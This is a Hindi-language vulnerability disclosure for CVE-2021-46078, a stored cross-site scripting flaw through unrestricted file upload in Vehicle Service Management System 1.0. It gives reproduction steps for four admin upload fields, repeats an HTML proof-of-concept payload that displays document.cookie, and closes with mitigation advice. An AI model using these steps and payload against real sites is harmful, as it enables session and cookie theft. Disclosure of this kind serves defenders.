CVE-2021-46078
शोषण शीर्षक: Vehicle Service Management System - 'एकाधिक' फ़ाइल अपलोड संग्रहीत क्रॉस-साइट स्क्रिप्टिंग की ओर ले जाता है
CVE: CVE-2021-46078
CVSS: 4.8 मध्यम
संदर्भ:
विवरण:
Sourcecodester Vehicle Service Management System 1.0 में एक अप्रतिबंधित फ़ाइल अपलोड भेद्यता मौजूद है। एक दूरस्थ हमलावर दुर्भावनापूर्ण फ़ाइलें अपलोड कर सकता है, जिससे संग्रहीत क्रॉस-साइट स्क्रिप्टिंग भेद्यता उत्पन्न होती है।
1. Vehicle Service Management System - 'MyAccount' (/admin/?page=user)
शोषण:
- प्रशासक पैनल में लॉगिन करें http://localhost/vehicle_service/admin
- My Account अनुभाग पर जाएँ http://localhost/vehicle_service/admin/?page=user
पेलोड:
<!DOCTYPE html>
<html>
<title>Stored XSS</title>
<body>
<script>
alert(document.cookie);
</script>
</body>
</html>
- उपरोक्त html कोड को उदाहरण के लिए XSS.html के रूप में सहेजें।
- My Account अनुभाग में सभी आवश्यक विवरण दर्ज करें और Avatar में html फ़ाइल ब्राउज़ करें।
- अपडेट बटन पर क्लिक करें।
- अवतार छवि को नए टैब में खोलें।
- दुर्भावनापूर्ण जावास्क्रिप्ट कोड सक्रिय हो गया।
2. Vehicle Service Management System - 'User List' (/admin/?page=user/manage_user)
शोषण:
- प्रशासक पैनल में लॉगिन करें http://localhost/vehicle_service/admin
- User List अनुभाग पर जाएँ और Create New बटन पर क्लिक करें।
पेलोड:
<!DOCTYPE html>
<html>
<title>Stored XSS</title>
<body>
<script>
alert(document.cookie);
</script>
</body>
</html>
- उपरोक्त html कोड को उदाहरण के लिए XSS.html के रूप में सहेजें।
- Create New User Page में सभी आवश्यक विवरण दर्ज करें और Avatar में html फ़ाइल ब्राउज़ करें।
- Save बटन पर क्लिक करें।
- अवतार छवि को नए टैब में खोलें।
- दुर्भावनापूर्ण जावास्क्रिप्ट कोड सक्रिय हो गया।
3. Vehicle Service Management System - 'Settings-System Logo' (/admin/?page=system_info)
शोषण:
- प्रशासक पैनल में लॉगिन करें http://localhost/vehicle_service/admin
- Settings अनुभाग पर जाएँ http://localhost/vehicle_service/admin/?page=system_info
पेलोड:
<!DOCTYPE html>
<html>
<title>Stored XSS</title>
<body>
<script>
alert(document.cookie);
</script>
</body>
</html>
- उपरोक्त html कोड को उदाहरण के लिए XSS.html के रूप में सहेजें।
- Settings अनुभाग में सभी आवश्यक विवरण दर्ज करें और System Logo में html फ़ाइल ब्राउज़ करें।
- अपडेट बटन पर क्लिक करें।
- System Logo छवि को नए टैब में खोलें।
- दुर्भावनापूर्ण जावास्क्रिप्ट कोड सक्रिय हो गया।
4. Vehicle Service Management System - 'Settings-Website Cover' (/admin/?page=system_info)
शोषण:
- प्रशासक पैनल में लॉगिन करें http://localhost/vehicle_service/admin
- Settings अनुभाग पर जाएँ http://localhost/vehicle_service/admin/?page=system_info
पेलोड:
<!DOCTYPE html>
<html>
<title>Stored XSS</title>
<body>
<script>
alert(document.cookie);
</script>
</body>
</html>
- उपरोक्त html कोड को उदाहरण के लिए XSS.html के रूप में सहेजें।
- Settings अनुभाग में सभी आवश्यक विवरण दर्ज करें और Website Cover में html फ़ाइल ब्राउज़ करें।
- अपडेट बटन पर क्लिक करें।
- Website Cover छवि को नए टैब में खोलें।
- दुर्भावनापूर्ण जावास्क्रिप्ट कोड सक्रिय हो गया।
प्रभाव:
एक हमलावर कई एंडपॉइंट्स पर दुर्भावनापूर्ण फ़ाइल अपलोड कर सकता है, जिससे संग्रहीत क्रॉस-साइट स्क्रिप्टिंग उत्पन्न होती है।
शमन:
निम्नलिखित लागू करने की अनुशंसा की जाती है:
- व्हाइट-लिस्ट फ़िल्टर के बिना फ़ाइल नाम और उसके एक्सटेंशन को कभी सीधे स्वीकार न करें।
- यदि यूनिकोड वर्णों की आवश्यकता नहीं है, तो यह अत्यधिक अनुशंसित है कि फ़ाइल नाम और एक्सटेंशन के लिए केवल अल्फा-न्यूमेरिक वर्ण और केवल एक डॉट को इनपुट के रूप में स्वीकार करें।
- सेवा से वंचित (DoS) हमलों को रोकने के लिए फ़ाइल आकार को अधिकतम मान तक सीमित करें।
- अपलोड की गई निर्देशिका में कोई "execute" अनुमति नहीं होनी चाहिए।
- केवल क्लाइंट-साइड सत्यापन पर निर्भर न रहें।